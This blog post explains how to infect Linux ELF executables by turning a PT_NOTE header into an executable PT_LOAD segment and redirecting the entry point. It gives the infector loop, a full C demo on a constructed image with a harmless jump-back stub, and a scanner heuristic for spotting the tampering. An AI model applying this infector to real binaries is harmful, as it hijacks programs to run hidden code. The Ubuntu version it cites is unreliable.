Recently I wrote a blog post about infecting Executable and Linkable Format (ELF) files on Linux. Specifically, a method that works on the latest Ubuntu 24.02.1 by turning a PT_NOTE segment into a PT_LOAD segment: the shellcode is appended to the end of the file, the repurposed program header is pointed at it so the kernel's ELF loader maps it into memory, and e_entry is redirected to the shellcode, which jumps back to the original entry point once it has run. You can find the source code here and a proof of concept demo on YouTube. The core of the infector is the loop below:
    // Save the original entry point before it is overwritten below; the
    // shellcode is patched to jump back to it once it has finished
    Elf64_Addr original_entry = elf_header->e_entry;

    // Look for a PT_NOTE segment (a program header entry, not a section)
    for (int i = 0; i < elf_header->e_phnum; i++) {
        if (program_headers[i].p_type == PT_NOTE) {
            // Convert it to a PT_LOAD segment that maps the appended shellcode
            printf("[+] Found PT_NOTE segment\n");
            printf("[+] Changing to PT_LOAD\n");
            program_headers[i].p_type   = PT_LOAD;
            program_headers[i].p_flags  = PF_R | PF_X;    // readable and executable
            program_headers[i].p_offset = file_offset;    // where the shellcode was appended in the file
            program_headers[i].p_vaddr  = memory_offset;  // where the loader will map it
            program_headers[i].p_memsz  += sc_len;
            program_headers[i].p_filesz += sc_len;
            // Patch the ELF header to start at the shellcode
            elf_header->e_entry = memory_offset;
            printf("[+] Patched e_entry\n");
            break;
        }
    }
    // Patch shellcode to jump to the original entry point after finishing
    patch(&shellcode, &shellcode_len, elf_header->e_entry, original_entry);

Two things decide whether the patched file still runs. First, the loader maps segments a page at a time and assumes p_vaddr and p_offset agree modulo the page size; if file_offset and memory_offset do not share the same in-page remainder, the wrong bytes land at memory_offset and the program crashes before the shellcode runs. Second, for a PIE executable, which is what Ubuntu's toolchain produces by default, p_vaddr and e_entry are offsets from a load base chosen at run time rather than absolute addresses, so memory_offset has to be chosen relative to the existing PT_LOAD segments (above the highest one is the usual choice) rather than as a fixed address.
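To show the procedure end to end, here is an added example that is not the post's code: it builds a skeletal ELF64 image in memory (constructed for the example, not a real binary), appends a 12-byte x86-64 jump-back stub in place of the post's shellcode, converts the PT_NOTE header to PT_LOAD while computing file_offset and memory_offset so the page-alignment rule holds, and finishes with a tell-tale check a scanner could run against the result. The names build_sample, infect, segment_containing and entry_in_trailing_segment are this example's own; the 64-bit non-PIE layout is assumed for simplicity.

```c
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define PAGE 0x1000UL

typedef struct { uint8_t *buf; size_t len; } image_t;   /* in-memory ELF file */
#define EHDR(img) ((Elf64_Ehdr *)(img)->buf)
#define PHDR(img) ((Elf64_Phdr *)((img)->buf + EHDR(img)->e_phoff))

/* Constructed sample: a skeletal ELF64 image with one PT_LOAD covering the whole
 * file and one PT_NOTE. A target for the header surgery, not a runnable program. */
static image_t build_sample(void)
{
    image_t img = { calloc(1, 0x200), 0x200 };
    Elf64_Ehdr *eh = EHDR(&img);
    memcpy(eh->e_ident, ELFMAG, SELFMAG);
    eh->e_ident[EI_CLASS] = ELFCLASS64; eh->e_ident[EI_DATA] = ELFDATA2LSB;
    eh->e_type = ET_EXEC; eh->e_machine = EM_X86_64;
    eh->e_entry = 0x400100;                 /* pretend _start lives here */
    eh->e_phoff = sizeof(Elf64_Ehdr); eh->e_phentsize = sizeof(Elf64_Phdr); eh->e_phnum = 2;
    Elf64_Phdr *ph = PHDR(&img);
    ph[0] = (Elf64_Phdr){ .p_type = PT_LOAD, .p_flags = PF_R | PF_X, .p_vaddr = 0x400000,
                          .p_filesz = 0x200, .p_memsz = 0x200, .p_align = PAGE };
    ph[1] = (Elf64_Phdr){ .p_type = PT_NOTE, .p_flags = PF_R, .p_offset = 0x180,
                          .p_vaddr = 0x400180, .p_filesz = 0x20, .p_memsz = 0x20, .p_align = 4 };
    return img;
}

/* Index of the PT_LOAD segment whose virtual range contains addr, or -1. */
static int segment_containing(const image_t *img, uint64_t addr)
{
    const Elf64_Phdr *ph = PHDR(img);
    for (int i = 0; i < EHDR(img)->e_phnum; i++)
        if (ph[i].p_type == PT_LOAD && addr >= ph[i].p_vaddr && addr < ph[i].p_vaddr + ph[i].p_memsz)
            return i;
    return -1;
}

/* Append a 12-byte x86-64 stub (mov rax, imm64; jmp rax) that hands control back
 * to the original entry point, then turn the first PT_NOTE header into a PT_LOAD
 * segment mapping it. Returns the new e_entry, or 0 if there is no PT_NOTE. */
static uint64_t infect(image_t *img)
{
    Elf64_Ehdr *eh = EHDR(img);
    Elf64_Phdr *ph = PHDR(img);
    uint64_t original_entry = eh->e_entry, high = 0;
    int note = -1;
    for (int i = 0; i < eh->e_phnum; i++) {
        if (ph[i].p_type == PT_LOAD && ph[i].p_vaddr + ph[i].p_memsz > high)
            high = ph[i].p_vaddr + ph[i].p_memsz;   /* top of the mapped image */
        if (ph[i].p_type == PT_NOTE && note < 0)
            note = i;
    }
    if (note < 0)
        return 0;
    /* Payload goes at EOF. The loader maps whole pages, so p_vaddr and p_offset
     * must agree modulo PAGE: take a fresh page above the image, same in-page part. */
    uint64_t file_offset = img->len;
    uint64_t memory_offset = ((high + PAGE - 1) & ~(PAGE - 1)) + PAGE + (file_offset & (PAGE - 1));
    uint8_t stub[12] = { 0x48, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0, 0xFF, 0xE0 };
    memcpy(stub + 2, &original_entry, 8);   /* the "patch" step: imm64 = old entry (LE host) */
    uint8_t *grown = realloc(img->buf, img->len + sizeof stub);
    if (!grown) return 0;
    img->buf = grown;
    memcpy(img->buf + img->len, stub, sizeof stub);
    img->len += sizeof stub;
    eh = EHDR(img); ph = PHDR(img);          /* the buffer may have moved */
    ph[note].p_type = PT_LOAD; ph[note].p_flags = PF_R | PF_X;
    ph[note].p_offset = file_offset; ph[note].p_align = PAGE;
    ph[note].p_vaddr = ph[note].p_paddr = memory_offset;
    ph[note].p_filesz = ph[note].p_memsz = sizeof stub;
    eh->e_entry = memory_offset;
    return memory_offset;
}

/* Tell-tale for a scanner: e_entry lies in a PT_LOAD that is not the first PT_LOAD
 * in the table and whose file bytes end exactly at EOF. A heuristic, not proof. */
static int entry_in_trailing_segment(const image_t *img)
{
    const Elf64_Phdr *ph = PHDR(img);
    int first_load = -1, seg = segment_containing(img, EHDR(img)->e_entry);
    for (int i = 0; i < EHDR(img)->e_phnum && first_load < 0; i++)
        if (ph[i].p_type == PT_LOAD)
            first_load = i;
    return seg >= 0 && seg != first_load && ph[seg].p_offset + ph[seg].p_filesz == img->len;
}

int main(void)
{
    image_t img = build_sample();
    printf("before: entry in segment %d, flagged=%d\n", segment_containing(&img, EHDR(&img)->e_entry), entry_in_trailing_segment(&img));
    uint64_t entry = infect(&img);
    printf("after:  e_entry=0x%llx in segment %d, flagged=%d\n", (unsigned long long)entry, segment_containing(&img, entry), entry_in_trailing_segment(&img));
    free(img.buf);
    return 0;
}
```

On the sample, the image ends at 0x400200, so the stub is placed at 0x402200: a page above the mapped image with the same low 12 bits as its file offset 0x200. The stub differs from the post's shellcode only in doing nothing before jumping back; the header edits and the entry redirection are the same steps the loop above performs, with p_align set to the page size because the note's original alignment of 4 is not meaningful for a loadable segment. The trailing-segment check fires after infection and not before, but only as a hint: confirm it with other indicators before treating a file as infected.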